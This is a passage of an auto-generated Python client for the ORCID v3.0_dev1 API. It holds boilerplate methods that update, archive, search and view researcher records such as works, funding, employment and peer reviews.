def edit_other_name_json_with_http_info(self, orcid, put_code, **kwargs):
"""
Edit other name
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.edit_other_name_json_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param OtherName body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method edit_other_name_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `edit_other_name_json`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `edit_other_name_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/other-names/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def edit_researcher_url_json(self, orcid, put_code, **kwargs):
"""
Edits researcher url for an ORCID ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.edit_researcher_url_json(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param ResearcherUrl body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.edit_researcher_url_json_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.edit_researcher_url_json_with_http_info(orcid, put_code, **kwargs)
return data
def edit_researcher_url_json_with_http_info(self, orcid, put_code, **kwargs):
"""
Edits researcher url for an ORCID ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.edit_researcher_url_json_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param ResearcherUrl body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method edit_researcher_url_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `edit_researcher_url_json`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `edit_researcher_url_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/researcher-urls/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def flag_as_archived_permission_notification(self, orcid, id, **kwargs):
"""
Archive a notification
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.flag_as_archived_permission_notification(orcid, id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param int id: (required)
:return: Notification
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.flag_as_archived_permission_notification_with_http_info(orcid, id, **kwargs)
else:
(data) = self.flag_as_archived_permission_notification_with_http_info(orcid, id, **kwargs)
return data
def flag_as_archived_permission_notification_with_http_info(self, orcid, id, **kwargs):
"""
Archive a notification
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.flag_as_archived_permission_notification_with_http_info(orcid, id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param int id: (required)
:return: Notification
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method flag_as_archived_permission_notification" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `flag_as_archived_permission_notification`")
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `flag_as_archived_permission_notification`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/notification-permission/{id}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['orcid_two_legs']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Notification',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def search_by_query_xml(self, **kwargs):
"""
Search records
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.search_by_query_xml(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str q:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.search_by_query_xml_with_http_info(**kwargs)
else:
(data) = self.search_by_query_xml_with_http_info(**kwargs)
return data
def search_by_query_xml_with_http_info(self, **kwargs):
"""
Search records
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.search_by_query_xml_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str q:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['q']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method search_by_query_xml" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/v3.0_dev1/search'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'q' in params:
query_params['q'] = params['q']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_education_json(self, orcid, put_code, **kwargs):
"""
Update an Education
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_education_json(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param Education body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_education_json_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.update_education_json_with_http_info(orcid, put_code, **kwargs)
return data
def update_education_json_with_http_info(self, orcid, put_code, **kwargs):
"""
Update an Education
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_education_json_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param Education body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_education_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `update_education_json`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `update_education_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/education/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_employment_json(self, orcid, put_code, **kwargs):
"""
Update an Employment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_employment_json(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param Employment body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_employment_json_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.update_employment_json_with_http_info(orcid, put_code, **kwargs)
return data
def update_employment_json_with_http_info(self, orcid, put_code, **kwargs):
"""
Update an Employment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_employment_json_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param Employment body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_employment_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `update_employment_json`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `update_employment_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/employment/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_funding_json(self, orcid, put_code, **kwargs):
"""
Update a Funding
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_funding_json(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param Funding body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_funding_json_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.update_funding_json_with_http_info(orcid, put_code, **kwargs)
return data
def update_funding_json_with_http_info(self, orcid, put_code, **kwargs):
"""
Update a Funding
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_funding_json_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param Funding body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_funding_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `update_funding_json`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `update_funding_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/funding/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_group_id_record_json(self, put_code, **kwargs):
"""
Update a Group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_group_id_record_json(put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str put_code: (required)
:param GroupIdRecord body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_group_id_record_json_with_http_info(put_code, **kwargs)
else:
(data) = self.update_group_id_record_json_with_http_info(put_code, **kwargs)
return data
def update_group_id_record_json_with_http_info(self, put_code, **kwargs):
"""
Update a Group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_group_id_record_json_with_http_info(put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str put_code: (required)
:param GroupIdRecord body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['put_code', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_group_id_record_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `update_group_id_record_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/group-id-record/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_peer_review_json(self, orcid, put_code, **kwargs):
"""
Update a Peer Review
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_peer_review_json(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param PeerReview body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_peer_review_json_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.update_peer_review_json_with_http_info(orcid, put_code, **kwargs)
return data
def update_peer_review_json_with_http_info(self, orcid, put_code, **kwargs):
"""
Update a Peer Review
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_peer_review_json_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param PeerReview body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_peer_review_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `update_peer_review_json`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `update_peer_review_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/peer-review/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_work_json(self, orcid, put_code, **kwargs):
"""
Update a Work
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_work_json(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param Work body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_work_json_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.update_work_json_with_http_info(orcid, put_code, **kwargs)
return data
def update_work_json_with_http_info(self, orcid, put_code, **kwargs):
"""
Update a Work
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_work_json_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param Work body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_work_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `update_work_json`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `update_work_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/work/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_activities(self, orcid, **kwargs):
"""
Fetch all activities
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_activities(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: ActivitiesSummary
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_activities_with_http_info(orcid, **kwargs)
else:
(data) = self.view_activities_with_http_info(orcid, **kwargs)
return data
def view_activities_with_http_info(self, orcid, **kwargs):
"""
Fetch all activities
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_activities_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: ActivitiesSummary
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_activities" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_activities`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/activities'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ActivitiesSummary',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_address(self, orcid, put_code, **kwargs):
"""
Fetch an address
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
